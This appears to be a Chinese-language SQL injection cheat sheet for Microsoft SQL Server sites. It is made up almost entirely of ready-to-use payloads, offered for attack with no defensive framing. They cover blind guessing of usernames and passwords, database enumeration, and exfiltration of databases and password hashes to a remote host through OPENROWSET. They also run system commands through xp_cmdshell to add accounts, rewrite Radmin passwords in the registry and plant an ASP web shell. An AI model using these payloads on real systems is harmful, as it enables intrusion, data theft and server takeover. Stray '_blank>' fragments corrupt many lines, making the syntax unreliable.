【判断有无注入点】
‘
and 1=1
and 1=2
【猜表一般表的名称无非是:admin adminuser user pass password】
and 0(select count(*) from *)
and 0(select count(*) from admin) //判断是否存在admin这张表
【猜帐号数目】
and 1=(select count(*) from admin where len(name)>0) //用户字段名称
and 1=(select count(*) from admin where len(_blank>password)>0) //密码字段名称
【猜解各个字段的长度】
猜解长度就是把>0变换 直到返回正确页面为止
猜解用户名:
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6) //错误
and 1=(select count(*) from admin where len(name)>5) //正确 长度是6
and 1=(select count(*) from admin where len(name)=6) //正确
猜解密码:
and 1=(select count(*) from admin where len(password)>11) //正确
and 1=(select count(*) from admin where len(password)>12) //错误 长度是12
and 1=(select count(*) from admin where len(password)=12) //正确
【猜解字符】
猜解用户名:
and 1=(select count(*) from admin where left(name,1)=a) //猜解用户帐号的第一位
and 1=(select count(*) from admin where left(name,2)=ab) //猜解用户帐号的第二位
就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
猜解密码:
and 1=(select top 1 count(*) from Admin where Asc(mid (pass,5,1))=51)
这个查询语句可以猜解中文的用户和_blank>密码.
只要把后面的数字换成中文的ASSIC码就OK.
最后把结果再转换成字符.
【查看_blank>数据库连接账号的权限:如返回正常证明是_blank>服务器角色sysadmin权限】
and 1=(select @@VERSION)
【判断连接_blank>数据库帐号:如采用SA账号连接返回正常就证明了连接账号是SA权限】
and 1=(SELECT IS_blank>_SRVROLEMEMBER(sysadmin))
and sa=(SELECT System_blank>_user)
and user_blank>_name()=dbo
and 0(select user_blank>_name()
【看xp_blank>_cmdshell是否删除】
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_blank>_cmdshell)
xp_blank>_cmdshell被删除,恢复,支持绝对路径的恢复
【爆库】
特殊_blank>技巧::%5c=\ 或者把/和\ 修改%5提交
and 0(select top 1 paths from newtable)
得到库名(从1到5都是系统的ID,6以上才可以判断)
and 1=(select name from master.dbo.sysdatabases where dbid=7)
and 0(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
依次提交 dbid = 7,8,9….
得到更多的_blank>数据库名
and 0(select top 1 name from bbs.dbo.sysobjects where xtype=U) 暴到一个表假设为admin
and 0(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin))
来得到其他的表。
and 0(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin
and uid>(str (id)))暴到UID的数值假设为18779569 uid=id
and 0(select top 1 name from bbs.dbo.syscolumns where id=18779569)
得到一个admin的一个字段,假设为 user_blank>_id
and 0(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in (id,…)) 来暴出其他的字段
and 0_id from BBS.dbo.admin where username>1)
可以得到用户名依次可以得到_blank>密码。假设存在user_blank>_id username ,password 等字段
and 0(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0 (select top 1 name from bbs.dbo.sysobjects where xtype=U) 得到表名
and 0(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in(Address))
and 0(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin
and uid>(str(id))) 判断id值
and 0(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段
?id=-1 union select
1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select
1,2,3,4,5,6,7,8, *,9,10,11,12,13 from admin (union,access也好用)
【开启远程_blank>数据库】
select * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 )
【其中连接字符串参数可以是任何端口用来连接】
比如:
select * from OPENROWSET(SQLOLEDB, uid=sa;pwd= 123;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433
select * from table
【复制目标主机的整个_blank>数据库】
insert所有远程表到本地表
基本语法:
insert into OPENROWSET(SQLOLEDB,
server=servername;uid=sa;pwd=123, select * from table1) select * from table2
这行语句将目标主机上table2表中的所有数据复制到远程_blank>数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方
比如:
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=
xxx.xxx.xxx.xxx,1433;,select * from table1) select * from table2
insert into
OPENROWSET(SQLOLEDB,uid=sa;pwd=
123;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;,select * from
_blank>_sysdatabases)
select * from master.dbo.sysdatabases
insert
into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=
xxx.xxx.xxx.xxx,1433;,select * from _blank>_sysobjects)
select * from
user_blank> _database.dbo.sysobjects
insert into
OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=
xxx.xxx.xxx.xxx,1433;,select * from _blank>_syscolumns)
select * from
user_blank> _database.dbo.syscolumns
【复制_blank>数据库】
insert into
OPENROWSET(SQLOLEDB,uid=sa;pwd=
123;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;,select * from table1) select *
from database..table1
insert into
OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;,select
* from table2) select * from database..table2
【复制哈西表(HASH)登录_blank>密码的hash存储于sysxlogins中】
insert into
OPENROWSET (SQLOLEDB,
uid=sa;pwd=123;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;,select * from
_blank>_sysxlogins) select * from database.dbo.sysxlogins
得到hash之后,就可以进行暴力破解。
遍历目录的方法: 先创建一个临时表:temp
;create table temp(id
nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));
;insert temp exec master.dbo.xp_blank>_availablemedia;获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_blank>_subdirs c:\;获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_blank>_dirtree c:\;
【获得所有子目录的目录树结构,并寸入temp表中】
;insert into temp(id) exec
master.dbo.xp_blank>_cmdshell type c:\web\index.asp;查看某个文件的内容
;insert
into temp(id) exec master.dbo.xp_blank>_cmdshell dir c:\;
;insert into
temp(id) exec master.dbo.xp_blank>_cmdshell dir c:\ *.asp /s/a;
;insert
into temp(id) exec master.dbo.xp_blank> _cmdshell cscript
C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc
;insert into temp(id,num1)
exec master.dbo.xp_blank>_dirtree c:\;(xp_blank>_dirtree适用权限PUBLIC)
【写入表】
语句1:and 1= (SELECT IS_blank>_SRVROLEMEMBER(sysadmin));
语句2:and 1=(SELECT IS_blank>_SRVROLEMEMBER (serveradmin));
语句3:and
1=(SELECT IS_blank>_SRVROLEMEMBER(setupadmin));
语句4:and 1=(SELECT
IS_blank>_SRVROLEMEMBER(securityadmin));
语句5:and 1=(SELECT
IS_blank>_SRVROLEMEMBER (securityadmin));
语句6:and 1=(SELECT
IS_blank>_SRVROLEMEMBER(diskadmin));
语句7:and 1= (SELECT
IS_blank>_SRVROLEMEMBER(bulkadmin));
语句8:and 1=(SELECT
IS_blank>_SRVROLEMEMBER (bulkadmin));
语句9:and 1=(SELECT
IS_blank>_MEMBER(db_blank>_owner));
【把路径写到表中去】
;create table
dirs(paths varchar(100), id int)
;insert dirs exec
master.dbo.xp_blank>_dirtree c:\
and 0(select top 1 paths from
dirs)
and 0 (select top 1 paths from dirs where paths not
in(@Inetpub))
;create table dirs1(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_blank>_dirtree e:\web
and
0(select top 1 paths from dirs1)
【把_blank>数据库备份到网页目录下载】
declare @a sysname; set @a=db_blank>_name();backup database @a to
disk=e:\web\down.bak;
and 1=(Select top 1 name from(Select top 12
id,name from sysobjects where xtype=char(85)) T order by id desc)
and
1=(Select Top 1 col_blank>_name(object_blank>_id(USER_blank>_LOGIN),1)
from sysobjects)
【参看相关表】
and 1=(select user_blank>_id from
USER_blank>_LOGIN)
and 0=(select user from USER_blank>_LOGIN where
user>1)
-=- wscript.shell example -=-
declare @o int
exec
sp_blank>_oacreate wscript.shell, @o out
exec sp_blank>_oamethod @o,
run, NULL, notepad.exe
; declare @o int exec sp_blank>_oacreate
wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, notepad.exe
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_blank>_oacreate scripting.filesystemobject, @o out
exec
sp_blank>_oamethod @o, opentextfile, @f out, c:\boot.ini, 1
exec @ret =
sp_blank>_oamethod @f, readline, @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_blank>_oamethod @f, readline, @line out
end
declare @o int, @f int, @t int, @ret int
exec
sp_blank>_oacreate scripting.filesystemobject, @o out
exec
sp_blank>_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1
exec @ret = sp_blank>_oamethod @f, writeline, NULL,
declare @o int, @ret int
exec sp_blank>_oacreate
speech.voicetext, @o out
exec sp_blank> _oamethod @o, register, NULL,
foo, bar
exec sp_blank>_oasetproperty @o, speed, 150
exec
sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to,us,
528
waitfor delay 00:00:05
; declare @o int, @ret int exec
sp_blank>_oacreate speech.voicetext, @o out exec sp_blank>_oamethod @o,
register, NULL, foo, bar exec sp_blank>_oasetproperty @o, speed, 150 exec
sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to us,
528 waitfor delay 00:00:05
xp_blank>_dirtree适用权限PUBLIC
exec
master.dbo.xp_blank>_dirtree c:\
【返回的信息有两个字段】
subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。
create table dirs(paths
varchar(100), id int)
建表,这里建的表是和上面xp_blank>_dirtree相关连,字段相等、类型相同。
insert dirs exec master.dbo.xp_blank>_dirtree c:\
只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果,
一步步达到我们想要的信息.
【阿D常用注入命令】
【看看是什么权限】
and 1=(Select IS_MEMBER(‘db_owner’))
And char(124)%2BCast(IS_MEMBER(‘db_owner’) as varchar(1))%2Bchar(124)=1
【检测是否有读取某数据库的权限】
and 1= (Select HAS_DBACCESS(‘master’))
And char(124)%2BCast(HAS_DBACCESS(‘master’) as varchar(1))%2Bchar(124)=1
【数字类型】
and char(124)%2Buser%2Bchar(124)=0
【字符类型】
and char(124)%2Buser%2Bchar(124)=0 and ”=’
【搜索类型】
and char(124)%2Buser%2Bchar(124)=0 and ‘%’=’
【爆用户名】
and user>0′ and user>0 and ”=’
【检测是否为SA权限】
and 1=(select IS_SRVROLEMEMBER(‘sysadmin’))
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1
【检测是不是MSSQL数据库】
and exists (select * from sysobjects)
【检测是否支持多行】
declare @d int
【恢复 xp_cmdshell】
exec master..dbo.sp_addextendedproc ‘xp_cmdshell’,’xplog70.dll’
select * from openrowset(‘sqloledb’,’server=xxx.xxx.xxx.xxx,1433;uid=test;pwd=pafpaf’,’select @@version’)
【执行命令】
【首先开启沙盘模式】
exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,1
【然后利用jet.oledb执行系统命令】
select * from openrowset(‘microsoft.jet.oledb.4.0′,’;database=c:\winnt\system32\ias\ias.mdb’,’select shell(“cmd.exe /c net user admin admin1234 /add”)’)
【执行命令】
;DECLARE @shell INT EXEC SP_OAcreate ‘wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ‘C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add’;
EXEC [master].[dbo].[xp_cmdshell] ‘cmd /c md c:\1111’
【判断xp_cmdshell扩展存储过程是否存在】
http://xxx.xxx.xxx.xxx/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = ‘X’ AND name = ‘xp_cmdshell’)
【写注册表】
exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,1
REG_SZ
【读注册表】
exec master..xp_regread ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon’,’Userinit’
【读取目录内容】
exec master..xp_dirtree ‘c:\winnt\system32\’,1,1
【数据库备份】
backup database pubs to disk = ‘c:\123.bak’
【爆出长度】
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0
【更改sa口令方法:用sql综合利用工具连接后,执行命令】
exec sp_password NULL,’新密码’,’sa’
【添加和删除一个SA权限的用户test】
exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin
【删除扩展存储过过程xp_cmdshell的语句】
exec sp_dropextendedproc ‘xp_cmdshell’
【添加扩展存储过过程】
EXEC [master]..sp_addextendedproc ‘xp_proxiedadata’, ‘c:\winnt\system32\sqllog.dll’
GRANT exec On xp_proxiedadata TO public
【停掉或激活某个服务】
exec master..xp_servicecontrol ‘stop’,’schedule’
exec master..xp_servicecontrol ‘start’,’schedule’
dbo.xp_subdirs
【只列某个目录下的子目录】
xp_getfiledetails ‘C:\Inetpub\wwwroot\SQLInject\login.asp’
dbo.xp_makecab
将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开
dbo.xp_makecab
‘c:\test.cab’,’mszip’,1,
‘C:\Inetpub\wwwroot\SQLInject\login.asp’,
‘C:\Inetpub\wwwroot\SQLInject\securelogin.asp’
xp_terminate_process
停掉某个执行中的程序,但赋予的参数是 Process ID。
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
xp_terminate_process 2484
xp_unpackcab
解开压缩档。
xp_unpackcab ‘c:\test.cab’,’c:\temp’,1
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SYSTEM\RAdmin\v2.0\Server\Parameters’,’Parameter’,’REG_BINARY’,0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为123456。如果要修改端口值 EXEC master.dbo.xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SYSTEM\RAdmin\v2.0\Server\Parameters’,’port’,’REG_BINARY’,0xd20400 则端口值改为1234
create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);
【得到数据库名】
insert into opendatasource(‘sqloledb’,’server=xxx.xxx.xxx.xxx,1443;uid=test;pwd=pafpaf;database=lcx’).lcx.dbo.ku select name from master.dbo.sysdatabases
【在Master中创建表,看看权限怎样】
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL)
【用 sp_makewebtask直接在web目录里写入一句话马】
http://xxx.xxx.xxx.xxx/dblogin123.asp?username=123‘;exec%20sp_makewebtask%20’d:\www\tt\88.asp’,’%20select%20”<%25execute(request(“a”))%25>”%20′
【更新表内容】
Update films SET kind = ‘Dramatic’ Where id = 123
【删除内容】
delete from table_name where Stockid = 3